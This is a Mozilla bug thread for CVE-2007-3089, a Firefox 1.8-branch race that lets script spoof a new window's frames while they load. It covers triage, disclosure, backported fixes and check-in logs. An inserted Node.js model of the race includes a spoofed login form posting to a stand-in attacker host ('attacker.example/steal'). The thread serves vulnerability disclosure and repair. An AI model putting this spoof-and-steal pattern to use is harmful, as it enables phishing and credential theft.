Closed Bug 381300 (CVE-2007-3089) Opened 17 years ago Closed 17 years ago

Frame spoofing is possible within a short time frame while the window is loading.

Categories

(Core :: DOM: Core & HTML, defect)

1.8 Branch
defect
Not set
normal

Tracking


RESOLVED FIXED

People

(Reporter: ronen.zilberman, Assigned: jst)

References

Details

(Keywords: fixed1.8.0.15, fixed1.8.1.5, qawanted, Whiteboard: [sg:low spoof] 1.8-branch only)

Attachments

(3 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

When opening a window from a script, it is possible to spoof the content of the newly opened window's frames within a short time frame, while the window is loading.

Because the exact time is non-constant and unknown, multiple attempts are carried out. The failed ones are silently discarded using a try/catch block.

This is similar to Bug 343168.
Both the 'frames[x].document.open()' method (described in above bug) and a normal 'frames[x].document' method are shown to reliably produce the exploit.

Reproducible: Always

Steps to Reproduce:
See attached test case.
Attached file Exploit testcase.
I can reproduce this with a current branch build, but not on the trunk.
Component: Security → DOM
Whiteboard: [sg:low spoof]
Assignee: dveditz → jst
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: wanted1.8.1.x+
Flags: wanted1.8.0.x+
Flags: blocking1.8.1.5?
Flags: blocking1.8.0.13?
Whiteboard: [sg:low spoof] → [sg:low spoof] 1.8-branch only?
Version: unspecified → 1.8 Branch
QA Contact: toolkit → ian
It seems that the problem is this:

The frame's location is "about:blank" while it is being loaded, and it is during this time that it can be spoofed (after the parent document has been loaded, but before the framed document has been loaded).
This was fixed on the trunk by changing the way we treat about:blank
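The race described in the report and the cause given in the comment above, as an added model in Node.js. This is not the attached testcase and not Gecko code: `Principal`, `Frame`, `raceSpoof`, the `'legacy'`/`'inherit'` policies and the origins `bank.example` / `attacker.example` are all assumptions made for the illustration. The `'legacy'` policy stands for the 1.8-branch behaviour where the interim about:blank document is not guarded by the parent's principal; `'inherit'` stands for the trunk behaviour (about:blank inheriting the principal of the context that created it) that the backport brings to the branch.

```javascript
'use strict';

// Added example (not from the bug or from Gecko): a model of the about:blank
// race. A freshly created frame sits at about:blank until its real document
// arrives; the question is which principal guards that interim document.

class Principal {
  constructor(origin) { this.origin = origin; }
  // Same-origin check, the only relation this model needs.
  subsumes(other) { return other !== null && this.origin === other.origin; }
}

// policy 'legacy'  : the interim about:blank document carries no usable
//                    principal, so the same-origin check never fires
//                    (assumed model of the pre-fix 1.8 branch behaviour).
// policy 'inherit' : the interim document inherits the principal of the
//                    context that created it (assumed model of the trunk fix).
class Frame {
  constructor(creatorPrincipal, targetUrl, policy) {
    this.targetUrl = targetUrl;
    this.location = 'about:blank';
    this.html = '';
    this.principal = policy === 'inherit' ? creatorPrincipal : null;
  }
  // The real load completes: location and principal now come from the target.
  finishLoad() {
    this.location = this.targetUrl;
    this.principal = new Principal(new URL(this.targetUrl).origin);
    this.html = '<real document>';
  }
}

function canAccess(caller, frame) {
  if (frame.principal === null) return true; // the hole: nothing to check against
  return caller.subsumes(frame.principal);
}

// frames[x].document.write() as seen from script running as `caller`.
function writeInto(caller, frame, html) {
  if (!canAccess(caller, frame)) {
    throw new Error('SecurityError: ' + caller.origin + ' -> ' + frame.location);
  }
  frame.html = html;
}

// The attacker loop from the report: try on every tick, because the moment the
// real document lands is unknown, and drop failures in try/catch.
// Returns the ticks on which a write succeeded.
function raceSpoof(caller, frame, ticks, loadAtTick, html) {
  const hits = [];
  for (let t = 0; t < ticks; t++) {
    if (t === loadAtTick) frame.finishLoad();
    try {
      writeInto(caller, frame, html);
      hits.push(t);
    } catch (e) {
      // silently discarded, as in the report
    }
  }
  return hits;
}

// Constructed scenario: attacker-origin script races a bank login frame that
// the bank's own page created and is loading.
function demo(policy) {
  const bank = new Principal('https://bank.example');
  const attacker = new Principal('https://attacker.example');
  const frame = new Frame(bank, 'https://bank.example/login', policy);
  return raceSpoof(attacker, frame, 8, 5, '<form action="https://attacker.example/steal">');
}

console.log('legacy  successful ticks:', demo('legacy'));
console.log('inherit successful ticks:', demo('inherit'));
```

Under `'legacy'` every attempt before the load completes succeeds and every attempt after it fails, which is exactly the window the report describes; under `'inherit'` no attacker attempt succeeds at any tick, while the creating origin itself can still script its own frame throughout. The model leaves out what happens to the pending navigation after a successful `document.open()`, which the bug does not describe.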
Whiteboard: [sg:low spoof] 1.8-branch only? → [sg:low spoof] 1.8-branch only
I wonder whether we could at least port part of that (e.g. the default principal for subframes)... Not sure how easy that would be.
Blocks: 382686
publicly disclosed by Michal Zalewski to full-disclosure.
Group: security
CC list accessible: false
Not accessible to reporter
The trunk fix was in bug 332182.  Looking at it now, it might not be impossible to merge to branch, if we're sure it doesn't break the web (which seems likely).  Some of the code is sure to not apply, and we'd need to add interfaces instead of changing them, but it might be doable in general....  Unfortunately, I'm not going to be able to do it in the near future.  :(
I think it's a critical vulnerability, isn't it? It's very dangerous if someone uses this exploit to steal accounts.

I would really appreciate it if you could fix this in the next branch build.
This bug got some publicity and one bank tells their users to 'stop using Firefox until it's fixed and switch to IE6'. http://www.multibank.pl/co_nowego/aktualnosci?_a=15793
Flags: blocking1.8.1.5?
Flags: blocking1.8.1.5+
Flags: blocking1.8.0.13?
Flags: blocking1.8.0.13+
It is gaining in publicity.
NIST's Vulnerability DB lists the CVSS Severity at a 10.0(High)  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3089

All Fx users at my work got a message from our corp security team last week telling us to uninstall Fx immediately.
I've confirmed that this patch fixes the "exploit testcase" in this bug.  I have NOT had a chance to do any other testing yet.  In particular, I have not run it on the tests attached to bug 332182.  It would be great if someone would, with all the various new-window pref settings (at the very least, with the settings to force all new windows into windows, tabs, and same rendering area).

Note that the tests can be run with jssh; I think we have some documentation on mozilla.org for that.

I'll try to get this also ported to the 1.8.0 branch.
Attachment #269025 - Flags: superreview?(jst)
Attachment #269025 - Flags: review?(mrbkap)
I should also note that if run under jssh the tests will do the different pref values automatically...  So that's really the way to go, imo.
Works with all the testcases from bug 332182 here, on Firefox 2.0.0.4+patch.
I'm basically gone starting today for two weeks or so.  jst or Blake, could you drive this in?  I don't have the 1.8.0 port done (or even significantly started), unfortunately.  :(
Keywords: qawanted
Whiteboard: [sg:low spoof] 1.8-branch only → [sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst
required to fix public exploit bug 382686
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

Looks good to me, sr=jst. I happened to spot one typo in surrounding code as I was reading through it, fix it if you want to:

- In nsDocShell::DoURILoad():

     // XXX: Is seems wrong that the owner is ignored - even if one is
Attachment #269025 - Flags: superreview?(jst) → superreview+
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

*stamp*
Attachment #269025 - Flags: review?(mrbkap) → review+
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

Hoping for some last-minute approval love.
Attachment #269025 - Flags: approval1.8.1.5?
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

approved for 1.8.1.5, a=dveditz
Attachment #269025 - Flags: approval1.8.1.5? → approval1.8.1.5+
Status: NEW → RESOLVED
Closed: 17 years ago
Keywords: fixed1.8.1.5
Resolution: --- → FIXED
Attachment #271902 - Flags: approval1.8.0.13?
Please see bug 387979.
Depends on: 387979
Alias: CVE-2007-3089
Verified using test cases in comment #1 on Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.5) Gecko/2007071317 Firefox/2.0.0.5. Also on Mac 2005rc2 build.
Depends on: CVE-2007-3844
In the interest of getting a Thunderbird 1.5.0.13 out ASAP to address the known problems, this spoofing bug will need to wait for 1.8.0.14 releases
Flags: blocking1.8.0.13+ → blocking1.8.0.14+
Attachment #271902 - Flags: approval1.8.0.13? → approval1.8.0.14?
Not needed in a Thunderbird 1.8.0 release, still wanted for browsers
Flags: blocking1.8.0.15+
Flags: blocking1.8.0.14-
Flags: blocking1.8.0.14+
Attachment #271902 - Flags: approval1.8.0.15?
Comment on attachment 271902 [details] [diff] [review]
1.8.0 branch patch

a=caillon for 1.8.0.15 (and clearing stale .14 request)
Attachment #271902 - Flags: approval1.8.0.15?
Attachment #271902 - Flags: approval1.8.0.15+
Attachment #271902 - Flags: approval1.8.0.14?
Keywords: checkin-needed
Whiteboard: [sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst → [check in on 1.8.0. Bug 388121 MUST land with it][sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst
MOZILLA_1_8_0_BRANCH:

Checking in caps/src/nsPrincipal.cpp;
/cvsroot/mozilla/caps/src/nsPrincipal.cpp,v  <--  nsPrincipal.cpp
new revision: 1.37.2.1.2.1; previous revision: 1.37.2.1
done
Checking in caps/src/nsScriptSecurityManager.cpp;
/cvsroot/mozilla/caps/src/nsScriptSecurityManager.cpp,v  <--  nsScriptSecurityManager.cpp
new revision: 1.266.2.7.2.11; previous revision: 1.266.2.7.2.10
done
Checking in content/base/src/nsFrameLoader.cpp;
/cvsroot/mozilla/content/base/src/nsFrameLoader.cpp,v  <--  nsFrameLoader.cpp
new revision: 1.53.6.1.4.2; previous revision: 1.53.6.1.4.1
done
Checking in content/base/src/nsDocument.h;
/cvsroot/mozilla/content/base/src/nsDocument.h,v  <--  nsDocument.h
new revision: 3.264.2.3.2.5; previous revision: 3.264.2.3.2.4
done
Checking in content/base/src/nsDocument.cpp;
/cvsroot/mozilla/content/base/src/nsDocument.cpp,v  <--  nsDocument.cpp
new revision: 3.566.2.6.2.17; previous revision: 3.566.2.6.2.16
done
Checking in docshell/base/nsDocShell.cpp;
/cvsroot/mozilla/docshell/base/nsDocShell.cpp,v  <--  nsDocShell.cpp
new revision: 1.719.2.21.2.14; previous revision: 1.719.2.21.2.13
done
Checking in docshell/base/nsDocShell.h;
/cvsroot/mozilla/docshell/base/nsDocShell.h,v  <--  nsDocShell.h
new revision: 1.186.2.3.2.2; previous revision: 1.186.2.3.2.1
done
Checking in dom/public/base/nsPIDOMWindow.h;
/cvsroot/mozilla/dom/public/base/nsPIDOMWindow.h,v  <--  nsPIDOMWindow.h
new revision: 1.49.2.2.4.1; previous revision: 1.49.2.2
done
Checking in dom/src/base/nsGlobalWindow.cpp;
/cvsroot/mozilla/dom/src/base/nsGlobalWindow.cpp,v  <--  nsGlobalWindow.cpp
new revision: 1.761.2.22.2.23; previous revision: 1.761.2.22.2.22
done
Checking in dom/src/base/nsGlobalWindow.h;
/cvsroot/mozilla/dom/src/base/nsGlobalWindow.h,v  <--  nsGlobalWindow.h
new revision: 1.250.2.9.2.4; previous revision: 1.250.2.9.2.3
done
Checking in embedding/components/windowwatcher/src/Makefile.in;
/cvsroot/mozilla/embedding/components/windowwatcher/src/Makefile.in,v  <--  Makefile.in
new revision: 1.26.26.1; previous revision: 1.26
done
Checking in embedding/components/windowwatcher/src/nsWindowWatcher.h;
/cvsroot/mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.h,v  <--  nsWindowWatcher.h
new revision: 1.21.8.1.4.2; previous revision: 1.21.8.1.4.1
done
Checking in embedding/components/windowwatcher/src/nsWindowWatcher.cpp;
/cvsroot/mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.cpp,v  <--  nsWindowWatcher.cpp
new revision: 1.100.2.5.2.4; previous revision: 1.100.2.5.2.3
done
Checking in dom/src/jsurl/nsJSProtocolHandler.cpp;
/cvsroot/mozilla/dom/src/jsurl/nsJSProtocolHandler.cpp,v  <--  nsJSProtocolHandler.cpp
new revision: 1.113.2.2.2.5; previous revision: 1.113.2.2.2.4
done
Checking in content/html/document/src/nsHTMLDocument.cpp;
/cvsroot/mozilla/content/html/document/src/nsHTMLDocument.cpp,v  <--  nsHTMLDocument.cpp
new revision: 3.615.2.10.2.17; previous revision: 3.615.2.10.2.16
done
Checking in content/base/public/nsIDocument.h;
/cvsroot/mozilla/content/base/public/nsIDocument.h,v  <--  nsIDocument.h
new revision: 3.207.2.1.4.4; previous revision: 3.207.2.1.4.3
done
Whiteboard: [check in on 1.8.0. Bug 388121 MUST land with it][sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst → [sg:low spoof] 1.8-branch only
Blocks: 346663
Blocks: 346664
Component: DOM → DOM: Core & HTML